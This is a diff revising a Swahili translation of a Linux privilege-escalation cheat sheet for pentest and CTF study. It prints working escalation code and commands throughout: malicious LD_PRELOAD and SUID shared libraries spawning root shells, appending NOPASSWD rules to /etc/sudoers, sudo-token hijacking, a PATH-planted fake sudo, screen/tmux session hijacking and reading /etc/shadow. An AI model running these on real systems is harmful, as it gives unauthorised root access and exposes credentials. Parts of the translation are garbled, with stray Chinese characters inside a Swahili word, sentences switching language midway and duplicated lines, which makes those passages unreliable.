amri zinaendeshwa kwa `sudo`, na hivyo kupelekea utekelezwaji wa arbitrary code kwa ruhusa zilizoinuliwa. +Privilege escalation inaweza kutokea ikiwa una uwezo wa kuendesha amri kwa `sudo` na output ya `sudo -l` inajumuisha taarifa **env_keep+=LD_PRELOAD**. Mipangilio hii inaruhusu variable ya mazingira **LD_PRELOAD** kudumu na kutambuliwa hata wakati amri zinaendeshwa kwa `sudo`, jambo ambalo linaweza kusababisha utekelezwaji wa code yoyote na vyeo vilivyoinuliwa. ``` Defaults env_keep += LD_PRELOAD ``` @@ -861,17 +890,17 @@ setuid(0); system("/bin/bash"); } ``` -Kisha **compile** kwa kutumia: +Kisha **compile it** kwa kutumia: ```bash cd /tmp gcc -fPIC -shared -o pe.so pe.c -nostartfiles ``` -Hatimaye, **kupandisha ruhusa** kwa kuendesha +Mwishowe, **escalate privileges** kwa kuendesha ```bash sudo LD_PRELOAD=./pe.so #Use any command you can run with sudo ``` > [!CAUTION] -> Privesc inayofanana inaweza kutumiwa vibaya ikiwa mshambuliaji anadhibiti **LD_LIBRARY_PATH** env variable kwa sababu anadhibiti njia ambapo libraries zitatafutwa. +> Privesc inayofanana inaweza kutumiwa vibaya ikiwa mshambuliaji anadhibiti **LD_LIBRARY_PATH** env variable kwa sababu anadhibiti njia ambapo maktaba zitatafutwa. ```c #include #include @@ -893,13 +922,13 @@ sudo LD_LIBRARY_PATH=/tmp ``` ### SUID Binary – .so injection -Unapokutana na binary yenye ruhusa za **SUID** ambazo zinaonekana zisizo za kawaida, ni desturi nzuri kuthibitisha kama inapakia faili za **.so** vizuri. Hii inaweza kuchunguzwa kwa kuendesha amri ifuatayo: +Unapokutana na binary iliyo na ruhusa za **SUID** na inayoonekana isiyo ya kawaida, ni desturi nzuri kuthibitisha kama inapakia faili za **.so** ipasavyo. Hii inaweza kuangaliwa kwa kuendesha amri ifuatayo: ```bash strace 2>&1 | grep -i -E "open|access|no such file" ``` -Kwa mfano, kukutana na hitilafu kama _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ inaonyesha uwezekano wa exploitation. +Kwa mfano, kukutana na kosa kama _"open(“/path/to/.config/libcalc.so”, O_RDONLY) = -1 ENOENT (No such file or directory)"_ kunaonyesha uwezekano wa kutumiwa. -Ili exploit hili, ungeendelea kwa kuunda faili la C, kwa mfano _"/path/to/.config/libcalc.c"_, lenye msimbo ufuatao: +Ili kuvitumia hili, ungeendelea kwa kuunda faili ya C, sema _"/path/to/.config/libcalc.c"_, lenye msimbo ufuatao: ```c #include #include @@ -910,13 +939,13 @@ void inject(){ system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p"); } ``` -Msimbo huu, mara umekusanywa na kutekelezwa, unalenga kuinua vibali kwa kubadilisha ruhusa za faili na kuendesha shell yenye vibali vilivyoinuliwa. +Msimbo huu, ikiwa imekompailiwa na kutekelezwa, unalenga kuinua ruhusa kwa kubadilisha vibali vya faili na kuendesha shell yenye ruhusa zilizoongezwa. -Kusanya faili ya C iliyotajwa hapo juu kuwa shared object (.so) kwa kutumia: +Kompaili faili ya C iliyotajwa hapo juu kuwa shared object (.so) ukitumia: ```bash gcc -shared -o /path/to/.config/libcalc.so -fPIC /path/to/.config/libcalc.c ``` -Mwishowe, kuendesha SUID binary iliyoathiriwa kunapaswa kuchochea exploit, na kuruhusu uwezekano wa kuvunjika kwa mfumo. +Hatimaye, kuendesha SUID binary iliyoathirika kunapaswa kusababisha exploit, na kuruhusu uwezekano wa system compromise. ## Shared Object Hijacking ```bash @@ -928,7 +957,7 @@ something.so => /lib/x86_64-linux-gnu/something.so readelf -d payroll | grep PATH 0x000000000000001d (RUNPATH) Library runpath: [/development] ``` -Sasa baada ya kupata SUID binary inayopakia library kutoka kwenye folder ambapo tunaweza kuandika, tuunde library hiyo katika folder hilo kwa jina linalohitajika: +Sasa baada ya kupata SUID binary inayopakia library kutoka folder ambapo tunaweza kuandika, hebu tuunde library katika folder hiyo kwa jina linalohitajika: ```c //gcc src.c -fPIC -shared -o /development/libshared.so #include @@ -945,13 +974,13 @@ Ikiwa unapata kosa kama ```shell-session ./suid_bin: symbol lookup error: ./suid_bin: undefined symbol: a_function_name ``` -hii ina maana kuwa maktaba uliyoitengeneza inahitaji kuwa na function iitwayo `a_function_name`. +hii inamaanisha kuwa maktaba uliyotengeneza inapaswa kuwa na function iitwayo `a_function_name`. ### GTFOBins -[**GTFOBins**](https://gtfobins.github.io) ni orodha iliyohaririwa ya Unix binaries ambazo zinaweza kutumiwa na attacker kuvuka vikwazo vya usalama vya eneo. [**GTFOArgs**](https://gtfoargs.github.io/) ni ile ile lakini kwa kesi ambapo unaweza **only inject arguments** katika command. +[**GTFOBins**](https://gtfobins.github.io) ni orodha iliyochaguliwa ya Unix binaries ambazo mtiifuzi anaweza kuzitumia kuvuka vikwazo vya usalama vya ndani. [**GTFOArgs**](https://gtfoargs.github.io/) ni ile ile lakini kwa matukio ambapo unaweza **kuingiza hoja tu** katika amri. -Mradi hukusanya legitimate functions za Unix binaries ambazo zinaweza kutumiwa kuabuse ku-break out restricted shells, escalate au maintain elevated privileges, transfer files, spawn bind na reverse shells, na kurahisisha kazi zingine za post-exploitation. +Mradi huu hukusanya kazi halali za Unix binaries ambazo zinaweza kutumika vibaya kuvuka restricted shells, kuongeza au kuhifadhi vigezo vya juu, kuhamisha faili, kuzalisha bind na reverse shells, na kurahisisha kazi nyingine za post-exploitation. > gdb -nx -ex '!sh' -ex quit\ > sudo mysql -e '! /bin/sh'\ @@ -970,55 +999,55 @@ https://gtfoargs.github.io/ ### FallOfSudo -Ikiwa unaweza kufikia `sudo -l` unaweza kutumia tool [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) kuangalia kama inapata jinsi ya ku-exploit any sudo rule. +If you can access `sudo -l` you can use the tool [**FallOfSudo**](https://github.com/CyberOne-Security/FallofSudo) to check if it finds how to exploit any sudo rule. -### Reusing Sudo Tokens +### Kutumia tena token za sudo -Katika kesi ambapo una **sudo access** lakini hakuna password, unaweza escalate privileges kwa **waiting for a sudo command execution and then hijacking the session token**. +Katika matukio ambapo una **sudo access** lakini huna nywila, unaweza kupandisha ruhusa kwa **kusubiri utekelezaji wa amri ya sudo kisha kuiba token ya kikao**. -Requirements to escalate privileges: +Mahitaji ya kupandisha ruhusa: -- Tayari una shell kama user "_sampleuser_" -- "_sampleuser_" have **used `sudo`** to execute something in the **last 15mins** (kwa chaguo-msingi hiyo ni muda wa sudo token that allows us to use `sudo` without introducing any password) -- `cat /proc/sys/kernel/yama/ptrace_scope` is 0 -- `gdb` is accessible (unaweza kuwa na uwezo wa kui-upload) +- Tayari una shell kama mtumiaji "_sampleuser_" +- "_sampleuser_" ame **tumia `sudo`** kutekeleza kitu katika **dakika 15 zilizopita** (kwa chaguo-msingi huo ndio muda wa sudo token unaoturuhusu kutumia `sudo` bila kuingiza nywila) +- `cat /proc/sys/kernel/yama/ptrace_scope` ni 0 +- `gdb` inapatikana (inawezekana kuipakia) -(Unaweza kwa muda kuwezesha `ptrace_scope` kwa `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` au kwa kudumu kwa kubadilisha `/etc/sysctl.d/10-ptrace.conf` na kuweka `kernel.yama.ptrace_scope = 0`) +(Unaweza kwa muda kuwezesha `ptrace_scope` kwa `echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope` au kwa kudumu kubadilisha `/etc/sysctl.d/10-ptrace.conf` na kuweka `kernel.yama.ptrace_scope = 0`) -Ikiwa mahitaji haya yote yamekamilika, **unaweza escalate privileges ukitumia:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject) +If all these requirements are met, **you can escalate privileges using:** [**https://github.com/nongiach/sudo_inject**](https://github.com/nongiach/sudo_inject) -- The **first exploit** (`exploit.sh`) itaunda binary `activate_sudo_token` katika _/tmp_. Unaweza kuitumia **activate the sudo token in your session** (hutapata moja kwa moja root shell, fanya `sudo su`): +- The **first exploit** (`exploit.sh`) itaunda binary `activate_sudo_token` katika _/tmp_. Unaweza kuitumia **kuamsha token ya sudo katika kikao chako** (hautapata moja kwa moja root shell, fanya `sudo su`): ```bash bash exploit.sh /tmp/activate_sudo_token sudo su ``` -- **Exploit ya pili** (`exploit_v2.sh`) itaunda sh shell katika _/tmp_ **inayomilikiwa na root na setuid** +- **exploit ya pili** (`exploit_v2.sh`) itaunda sh shell katika _/tmp_ **imilikiwa na root na setuid** ```bash bash exploit_v2.sh /tmp/sh -p ``` -- **exploit ya tatu** (`exploit_v3.sh`) ita **kuunda faili ya sudoers** ambayo inafanya **sudo tokens kuwa za kudumu na kuruhusu watumiaji wote kutumia sudo** +- **Exploit ya tatu** (`exploit_v3.sh`) itaunda **sudoers file** inayofanya **sudo tokens** kuwa ya milele na kuruhusu watumiaji wote kutumia **sudo** ```bash bash exploit_v3.sh sudo su ``` ### /var/run/sudo/ts/\ -Ikiwa una **idhini ya kuandika** katika folda au kwa faili yoyote iliyoundwa ndani ya folda unaweza kutumia binary [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) ili **kuunda sudo token kwa mtumiaji na PID**.\ -Kwa mfano, ikiwa unaweza kuandika juu ya faili _/var/run/sudo/ts/sampleuser_ na una shell kama mtumiaji huyo na PID 1234, unaweza **kupata ruhusa za sudo** bila ya kuhitaji kujua nenosiri kwa kufanya: +Ikiwa una **idhini za kuandika** kwenye saraka au kwenye faili yoyote iliyotengenezwa ndani ya saraka unaweza kutumia binary [**write_sudo_token**](https://github.com/nongiach/sudo_inject/tree/master/extra_tools) **kuunda token ya sudo kwa mtumiaji na PID**.\ +Kwa mfano, ikiwa unaweza kuandika tena faili _/var/run/sudo/ts/sampleuser_ na una shell kama mtumiaji huyo mwenye PID 1234, unaweza **kupata ruhusa za sudo** bila kuhitaji kujua nenosiri kwa kufanya: ```bash ./write_sudo_token 1234 > /var/run/sudo/ts/sampleuser ``` ### /etc/sudoers, /etc/sudoers.d -Faili `/etc/sudoers` na faili ndani ya `/etc/sudoers.d` zinaweka ni nani anaweza kutumia `sudo` na jinsi. Faili hizi **kwa chaguo-msingi zinaweza kusomwa tu na mtumiaji root na kundi root**.\ -**Ikiwa** unaweza **kusoma** faili hii unaweza kuwa na uwezo wa **kupata taarifa za kuvutia**, na kama unaweza **kuandika** faili yoyote utaweza **escalate privileges**. +Faili `/etc/sudoers` na faili zilizomo ndani ya `/etc/sudoers.d` zinaweka ni nani anaweza kutumia `sudo` na jinsi inavyofanya kazi. Faili hizi **kwa chaguo-msingi zinaweza kusomwa tu na mtumiaji root na kikundi root**.\ +**Ikiwa** unaweza **kusoma** faili hii unaweza kuwa na uwezo wa **kupata taarifa za kuvutia**, na ikiwa unaweza **kuandika** faili yoyote utaweza **kupandisha ruhusa**. ```bash ls -l /etc/sudoers /etc/sudoers.d/ ls -ld /etc/sudoers.d/ ``` -Ikiwa unaweza kuandika, unaweza kutumia vibaya ruhusa hii. +Ikiwa unaweza kuandika, unaweza kutumia vibaya ruhusa hii ```bash echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers echo "$(whoami) ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/README @@ -1032,15 +1061,15 @@ echo "Defaults timestamp_timeout=-1" >> /etc/sudoers.d/win ``` ### DOAS -Kuna baadhi ya mbadala kwa binary ya `sudo` kama `doas` kwa OpenBSD; kumbuka kukagua usanidi wake katika `/etc/doas.conf` +Kuna mbadala kadhaa kwa binary ya `sudo` kama `doas` ya OpenBSD, kumbuka kuangalia usanidi wake katika `/etc/doas.conf` ``` permit nopass demo as root cmd vim ``` ### Sudo Hijacking -Ikiwa unajua kuwa **mtumiaji kawaida hujiunga na mashine na hutumia `sudo`** kuinua ruhusa na umepata shell ndani ya muktadha wa mtumiaji, unaweza **kuunda executable mpya ya sudo** ambayo itatekeleza kodi yako kama root kisha amri ya mtumiaji. Kisha, **badilisha $PATH** ya muktadha wa mtumiaji (kwa mfano kwa kuongeza path mpya katika .bash_profile) ili wakati mtumiaji anapotekeleza sudo, executable yako ya sudo itatekelezwa. +Ikiwa unajua kwamba **user kawaida huunganishwa kwenye machine na hutumia `sudo`** kuongeza privileges na umepata shell ndani ya user context, unaweza **kuunda executable mpya ya sudo** itakayotekeleza code yako kama root kisha amri ya user. Kisha, **badilisha $PATH** ya user context (kwa mfano kwa kuongeza path mpya katika .bash_profile) ili wakati user atakapotekeleza sudo, executable yako ya sudo itatekelezwa. -Kumbuka kwamba ikiwa mtumiaji anatumia shell tofauti (si bash) utahitaji kubadilisha faili nyingine ili kuongeza path mpya. Kwa mfano[ sudo-piggyback](https://github.com/APTy/sudo-piggyback) hubadilisha `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Unaweza kupata mfano mwingine katika [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py) +Tambua kwamba ikiwa user anatumia shell tofauti (si `bash`) utahitaji kubadilisha faili nyingine ili kuongeza path mpya. Kwa mfano [sudo-piggyback](https://github.com/APTy/sudo-piggyback) hubadilisha `~/.bashrc`, `~/.zshrc`, `~/.bash_profile`. Unaweza kupata mfano mwingine katika [bashdoor.py](https://github.com/n00py/pOSt-eX/blob/master/empire_modules/bashdoor.py) Au kuendesha kitu kama: ```bash @@ -1057,16 +1086,16 @@ zsh echo $PATH sudo ls ``` -## Maktaba Iliyoshirikiwa +## Maktaba ya Kushiriki ### ld.so -Faili `/etc/ld.so.conf` inaonyesha **kutoka wapi faili za usanidi zilizopakiwa zinatoka**. Kawaida, faili hii ina njia ifuatayo: `include /etc/ld.so.conf.d/*.conf` +Faili `/etc/ld.so.conf` inaonyesha **chanzo cha faili za usanidi zilizopakiwa**. Kawaida, faili hii ina njia ifuatayo: `include /etc/ld.so.conf.d/*.conf` -Hii ina maana kwamba faili za usanidi kutoka `/etc/ld.so.conf.d/*.conf` zitasomwa. Faili hizi za usanidi **zinaelekeza kwenye saraka nyingine** ambapo **maktaba** zitatafutwa. Kwa mfano, yaliyomo katika `/etc/ld.so.conf.d/libc.conf` ni `/usr/local/lib`. **Hii ina maana kwamba mfumo utatafuta maktaba ndani ya `/usr/local/lib`**. +Hiyo ina maana kwamba faili za usanidi kutoka `/etc/ld.so.conf.d/*.conf` zitasomwa. Faili hizi za usanidi zinaonyesha folda nyingine ambapo **libraries** zitatafutwa. Kwa mfano, maudhui ya `/etc/ld.so.conf.d/libc.conf` ni `/usr/local/lib`. **Hii ina maana mfumo utaatafuta libraries ndani ya `/usr/local/lib`**. -Iwapo kwa sababu fulani **mtumiaji ana ruhusa za kuandika** kwenye yoyote ya njia zilizotajwa: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, faili yoyote ndani ya `/etc/ld.so.conf.d/` au saraka yoyote ndani ya faili ya usanidi ndani ya `/etc/ld.so.conf.d/*.conf` anaweza kuwa na uwezo wa kupandisha ruhusa.\ -Angalia **jinsi ya kutumia upungufu huu wa usanidi** kwenye ukurasa ufuatao: +Ikiwa kwa sababu yoyote **mtumiaji ana ruhusa za kuandika** kwenye mojawapo ya njia zilizoonyeshwa: `/etc/ld.so.conf`, `/etc/ld.so.conf.d/`, faili yoyote ndani ya `/etc/ld.so.conf.d/` au folda yoyote ndani ya faili za usanidi ndani ya `/etc/ld.so.conf.d/*.conf` anaweza kupandisha ruhusa.\ +Angalia **jinsi ya kuchukua faida ya misconfiguration hii** kwenye ukurasa ufuatao: {{#ref}} @@ -1084,7 +1113,7 @@ linux-gate.so.1 => (0x0068c000) libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) /lib/ld-linux.so.2 (0x005bb000) ``` -Kwa kunakili lib kwenye `/var/tmp/flag15/`, itatumiwa na programu hapa kama ilivyoainishwa katika kigezo cha `RPATH`. +Kwa kunakili lib hadi `/var/tmp/flag15/`, itaitumika na programu katika sehemu hii kama ilivyoainishwa katika kigezo cha `RPATH`. ``` level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ @@ -1093,7 +1122,7 @@ linux-gate.so.1 => (0x005b0000) libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) /lib/ld-linux.so.2 (0x00737000) ``` -Kisha unda maktaba hatari katika `/var/tmp` kwa kutumia `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` +Kisha unda maktaba ya uovu katika `/var/tmp` kwa kutumia `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` ```c #include #define SHELL "/bin/sh" @@ -1108,24 +1137,24 @@ execve(file,argv,0); ``` ## Uwezo -Uwezo za Linux hutoa **sehemu ndogo ya mamlaka za root zinazopatikana kwa mchakato**. Hii kwa ufanisi hugawanya mamlaka za root **kuwa vitengo vidogo na maalum**. Kila kimoja cha vitengo hivi kinaweza kisha kutolewa kwa mchakato kwa kujitegemea. Kwa njia hii seti kamili ya mamlaka inapunguzwa, kupunguza hatari za exploitation.\ -Soma ukurasa ufuatao ili **ujifunze zaidi kuhusu uwezo na jinsi ya kuvitumia vibaya**: +Linux capabilities hutoa **sehemu ndogo ya ruhusa za root zinazopatikana kwa mchakato**. Hii kwa ufanisi inagawanya ruhusa za root kuwa **vitengo vidogo vinavyotofautiana**. Kila kimoja cha vitengo hivi kinaweza kuzawadiwa kwa mchakato kwa kujitegemea. Kwa njia hii seti kamili ya ruhusa inapunguzwa, kupunguza hatari za exploitation.\ +Soma ukurasa ufuatao ili **ujifunze zaidi kuhusu capabilities na jinsi ya kuzitumia vibaya**: {{#ref}} linux-capabilities.md {{#endref}} -## Ruhusa za saraka +## Ruhusa za Directory -Katika saraka, **bit ya "execute"** inaonyesha kuwa mtumiaji anayehusika anaweza "**cd**" ndani ya saraka.\ -Bit ya **"read"** inaonyesha kuwa mtumiaji anaweza **list** faili, na bit ya **"write"** inaonyesha mtumiaji anaweza **delete** na **create** faili mpya. +Katika directory, the **bit for "execute"** inaonyesha kwamba mtumiaji aliyeathirika anaweza "**cd**" ndani ya folda.\ +Bit ya **"read"** inaonyesha mtumiaji anaweza **kuorodhesha** **faili**, na bit ya **"write"** inaonyesha mtumiaji anaweza **kufuta** na **kuunda** **faili** mpya. ## ACLs -Access Control Lists (ACLs) zinawakilisha tabaka la pili la ruhusa za hiari, zenye uwezo wa **kupindua ruhusa za jadi za ugo/rwx**. Ruhusa hizi zinaimarisha udhibiti wa ufikishaji wa faili au saraka kwa kuruhusu au kukataa haki kwa watumiaji maalum ambao si wamiliki au sehemu ya kundi. Ngazi hii ya undani inahakikisha usimamizi wa upatikanaji kwa usahihi zaidi. Maelezo zaidi yanaweza kupatikana [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux). +Access Control Lists (ACLs) zinawakilisha tabaka la pili la ruhusa za hiari, zikiwa na uwezo wa **kuzipindisha ruhusa za jadi za ugo/rwx**. Ruhusa hizi zinaongeza udhibiti juu ya upatikanaji wa faili au directory kwa kuruhusu au kukataa haki kwa watumiaji maalum ambao sio wamiliki au sehemu ya kikundi. Kiwango hiki cha **undani kinahakikisha usimamizi wa upatikanaji uliosahihi zaidi**. Further details can be found [**here**](https://linuxconfig.org/how-to-manage-acls-on-linux). -**Mpa** mtumiaji "kali" ruhusa za read na write kwenye faili: +**Mpa** mtumiaji "kali" ruhusa za "read" na "write" juu ya faili: ```bash setfacl -m u:kali:rw file.txt #Set it in /etc/sudoers or /etc/sudoers.d/README (if the dir is included) @@ -1136,10 +1165,10 @@ setfacl -b file.txt #Remove the ACL of the file ```bash getfacl -t -s -R -p /bin /etc /home /opt /root /sbin /usr /tmp 2>/dev/null ``` -## Fungua shell sessions +## Vikao wazi vya shell -Katika **matoleo ya zamani** unaweza **hijack** baadhi ya **shell** session za mtumiaji mwingine (**root**).\ -Katika **matoleo mapya** utaweza **kujiunga** na screen sessions za **mtumiaji wako mwenyewe** tu. Hata hivyo, unaweza kupata **taarifa za kuvutia ndani ya session**. +Katika **matoleo ya zamani** unaweza **hijack** baadhi ya vikao vya **shell** vya user mwingine (**root**).\ +Katika **matoleo mapya** utaweza **connect** kwa screen sessions tu za **your own user**. Hata hivyo, unaweza kupata **taarifa za kuvutia ndani ya session**. ### screen sessions hijacking @@ -1158,7 +1187,7 @@ screen -x [user]/[session id] ``` ## tmux sessions hijacking -Hii ilikuwa tatizo kwa **old tmux versions**. Sikuweza hijack tmux (v2.1) session iliyotengenezwa na root kama non-privileged user. +Hii ilikuwa tatizo kwa **matoleo ya zamani ya tmux**. Sikuweza hijack session ya tmux (v2.1) iliyoundwa na root wakati nilikuwa mtumiaji asiye na ruhusa. **Orodhesha tmux sessions** ```bash @@ -1168,7 +1197,7 @@ tmux -S /tmp/dev_sess ls #List using that socket, you can start a tmux session i ``` ![](<../../images/image (837).png>) -**Unganisha kwenye session** +**Unganisha kwenye kikao** ```bash tmux attach -t myname #If you write something in this session it will appears in the other opened one tmux attach -d -t myname #First detach the session from the other console and then access it yourself @@ -1178,139 +1207,137 @@ rw-rw---- 1 root devs 0 Sep 1 06:27 /tmp/dev_sess #In this case root and devs c # If you are root or devs you can access it tmux -S /tmp/dev_sess attach -t 0 #Attach using a non-default tmux socket ``` -Angalia **Valentine box from HTB** kwa mfano. +Angalia **Valentine box kutoka HTB** kwa mfano. ## SSH ### Debian OpenSSL Predictable PRNG - CVE-2008-0166 -Vifunguo vyote vya SSL na SSH vilivyotengenezwa kwenye mifumo yenye msingi wa Debian (Ubuntu, Kubuntu, etc) kati ya September 2006 na May 13th, 2008 vinaweza kuathiriwa na hitilafu hii.\ -Hitilafu hii inasababishwa wakati wa kuunda ufunguo mpya wa ssh katika OS hizo, kwani **tu 32,768 variations zilikuwa zinazowezekana**. Hii inamaanisha kwamba uwezekano wote unaweza kuhesabiwa na **ukiwa na ufunguo wa umma wa ssh unaweza kutafuta ufunguo wa siri unaolingana**. Unaweza kupata uwezekano uliokadiriwa hapa: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) +Vifunguo vyote vya SSL na SSH vilivyotengenezwa kwenye mifumo inayotegemea Debian (Ubuntu, Kubuntu, etc) kati ya September 2006 na May 13th, 2008 vinaweza kuathiriwa na hitilafu hii.\ +Hitilafu hii hutokana na wakati wa kuunda ssh key mpya katika OS hizo, kwani **tu tofauti 32,768 zilikuwa zawezekana**. Hii inamaanisha kwamba uwezekano wote unaweza kuhesabiwa na **ukiwa na ssh public key unaweza kutafuta private key inayolingana**. Unaweza kupata uwezekano uliohesabiwa hapa: [https://github.com/g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh) ### SSH Interesting configuration values -- **PasswordAuthentication:** Inaeleza kama uthibitishaji wa password unaruhusiwa. Chaguo-msingi ni `no`. -- **PubkeyAuthentication:** Inaeleza kama uthibitishaji kwa kutumia public key unaruhusiwa. Chaguo-msingi ni `yes`. -- **PermitEmptyPasswords**: Wakati uthibitishaji wa password unaporuhusiwa, inaeleza kama server inaruhusu kuingia kwenye akaunti zenye password tupu. Chaguo-msingi ni `no`. +- **PasswordAuthentication:** Inaelezea kama uthibitishaji kwa nenosiri unaruhusiwa. Chaguo-msingi ni `no`. +- **PubkeyAuthentication:** Inaelezea kama uthibitishaji wa public key unaruhusiwa. Chaguo-msingi ni `yes`. +- **PermitEmptyPasswords**: Inapowezekana uthibitishaji kwa nenosiri, inaonyesha kama server inaruhusu kuingia kwa akaunti zenye nenosiri tupu. Chaguo-msingi ni `no`. ### PermitRootLogin -Inaeleza kama root anaweza kuingia kwa kutumia ssh, chaguo-msingi ni `no`. Thamani zinazowezekana: +Inaelezea kama root anaweza kuingia kwa kutumia ssh, chaguo-msingi ni `no`. Thamani zinazowezekana: -- `yes`: root anaweza kuingia kwa kutumia nenosiri na private key -- `without-password` or `prohibit-password`: root anaweza kuingia tu kwa kutumia private key -- `forced-commands-only`: Root anaweza kuingia tu kwa kutumia private key na ikiwa chaguo za command zimeainishwa +- `yes`: root anaweza kuingia kwa kutumia password na private key +- `without-password` or `prohibit-password`: root anaweza kuingia kwa kutumia private key pekee +- `forced-commands-only`: Root anaweza kuingia tu kwa kutumia private key na ikiwa chaguzi za commands zimetajwa - `no` : hapana ### AuthorizedKeysFile -Inaeleza faili zinazobeba public keys ambazo zinaweza kutumika kwa uthibitishaji wa mtumiaji. Inaweza kuwa na tokens kama `%h`, ambazo zitatimizwa na saraka ya nyumbani. **You can indicate absolute paths** (starting in `/`) or **relative paths from the user's home**. For example: +Inaelezea faili zinazoshikilia public keys ambazo zinaweza kutumika kwa uthibitishaji wa mtumiaji. Inaweza kujumuisha tokens kama `%h`, ambazo zitat替被 na saraka ya nyumbani. **You can indicate absolute paths** (starting in `/`) or **relative paths from the user's home**. For example: ```bash AuthorizedKeysFile .ssh/authorized_keys access ``` -Usanidi huo utaonyesha kwamba ikiwa utajaribu kuingia kwa kutumia **private** key ya mtumiaji "**testusername**", ssh italinganisha public key ya key yako na zile zilizopo katika `/home/testusername/.ssh/authorized_keys` na `/home/testusername/access` +Utekelezaji huo utaonyesha kwamba ukijaribu kuingia kwa kutumia **private** key ya mtumiaji "**testusername**", ssh italinganisha public key ya key yako na zile zilizopo katika `/home/testusername/.ssh/authorized_keys` na `/home/testusername/access` ### ForwardAgent/AllowAgentForwarding -SSH agent forwarding inakuwezesha **use your local SSH keys instead of leaving keys** (without passphrases!) kukaa kwenye server yako. Hivyo, utaweza **jump** via ssh **to a host** na kutoka hapo **jump to another** host **using** the **key** iliyoko kwenye **initial host** yako. +SSH agent forwarding inakuwezesha **use your local SSH keys instead of leaving keys** (without passphrases!) kukaa kwenye server yako. Hivyo, utaweza **jump** via ssh **to a host** na kutoka hapo **jump to another** host **using** the **key** iliyoko katika **initial host** yako. -Unahitaji kuweka chaguo hili katika `$HOME/.ssh.config` kama hii: +Unahitaji kuweka chaguo hili katika `$HOME/.ssh.config` hivi: ``` Host example.com ForwardAgent yes ``` -Kumbuka kwamba ikiwa `Host` ni `*`, kila wakati mtumiaji anapohamia mashine tofauti, host hiyo itakuwa na uwezo wa kupata vifunguo (ambayo ni tatizo la usalama). +Tambua kwamba ikiwa `Host` ni `*`, kila wakati mtumiaji anapovuka kwenda mashine tofauti, host hiyo itaweza kupata keys (ambayo ni tatizo la usalama). -The file `/etc/ssh_config` can **override** this **options** and allow or denied this configuration.\ -Faili `/etc/ssh_config` inaweza **kubadilisha** chaguzi hizi na kuruhusu au kukataa usanidi huu.\ -The file `/etc/sshd_config` can **allow** or **denied** ssh-agent forwarding with the keyword `AllowAgentForwarding` (default is allow). -Faili `/etc/sshd_config` inaweza **kuruhusu** au **kukataa** ssh-agent forwarding kwa kutumia neno kuu `AllowAgentForwarding` (chaguo-msingi ni kuruhusu). +The file `/etc/ssh_config` can **kubadilisha** hizi **chaguzi** na kuruhusu au kuzuia usanidi huu.\ +Faili `/etc/sshd_config` inaweza **kuruhusu** au **kuzuia** ssh-agent forwarding kwa kutumia ufunguo `AllowAgentForwarding` (chaguo-msingi ni kuruhusu). -Ikiwa unagundua kuwa Forward Agent imewekwa katika mazingira, soma ukurasa ufuatao kwani **huenda ukaweza kuitumia vibaya ili kupandisha ruhusa**: +Ikiwa utakuta kwamba Forward Agent imewekwa katika mazingira, soma ukurasa ufuatao kwani **huenda ukaweza kuitumia vibaya kupandisha ruhusa**: {{#ref}} ssh-forward-agent-exploitation.md {{#endref}} -## Faili za Kuvutia +## Faili Zinazovutia ### Faili za profile -The file `/etc/profile` and the files under `/etc/profile.d/` are **scripts that are executed when a user runs a new shell**. Kwa hivyo, ikiwa unaweza **kuandika au kubadilisha yoyote kati yao, unaweza kupandisha ruhusa**. +Faili `/etc/profile` na faili zilizo chini ya `/etc/profile.d/` ni **scripts zinazoendeshwa wakati mtumiaji anapoanzisha shell mpya**. Kwa hivyo, ikiwa unaweza **kuandika au kubadilisha yoyote kati yao unaweza kupandisha ruhusa**. ```bash ls -l /etc/profile /etc/profile.d/ ``` -Ikiwa script ya profile isiyokuwa ya kawaida inapopatikana unapaswa kuikagua kwa ajili ya **maelezo nyeti**. +Ikiwa skripti ya profile isiyokuwa ya kawaida itapatikana, unapaswa kuikagua kwa **maelezo nyeti**. ### Faili za Passwd/Shadow -Kulingana na mfumo wa uendeshaji, faili za `/etc/passwd` na `/etc/shadow` zinaweza kuwa na jina tofauti au kunaweza kuwa na nakala ya akiba. Kwa hivyo inashauriwa **kutafuta zote** na **kuangalia kama unaweza kuzisoma** ili kuona **kama kuna hashes** ndani ya faili: +Kulingana na OS, faili za `/etc/passwd` na `/etc/shadow` zinaweza kutumia jina tofauti au kunaweza kuwa na nakala ya ziada. Kwa hivyo inashauriwa **kutafuta zote** na **kuangalia ikiwa unaweza kuzisoma** ili kuona **ikiwa kuna hashes** ndani ya faili: ```bash #Passwd equivalent files cat /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null #Shadow equivalent files cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db /etc/security/opasswd 2>/dev/null ``` -Wakati mwingine unaweza kupata **password hashes** ndani ya faili ya `/etc/passwd` (au sawa) +Katika baadhi ya matukio unaweza kupata **password hashes** ndani ya faili `/etc/passwd` (au faili sawa) ```bash grep -v '^[^:]*:[x\*]' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null ``` ### Inayoweza kuandikwa /etc/passwd -Kwanza, tengeneza password kwa kutumia moja ya amri zifuatazo. +Kwanza, tengeneza nywila kwa moja ya amri zifuatazo. ``` openssl passwd -1 -salt hacker hacker mkpasswd -m SHA-512 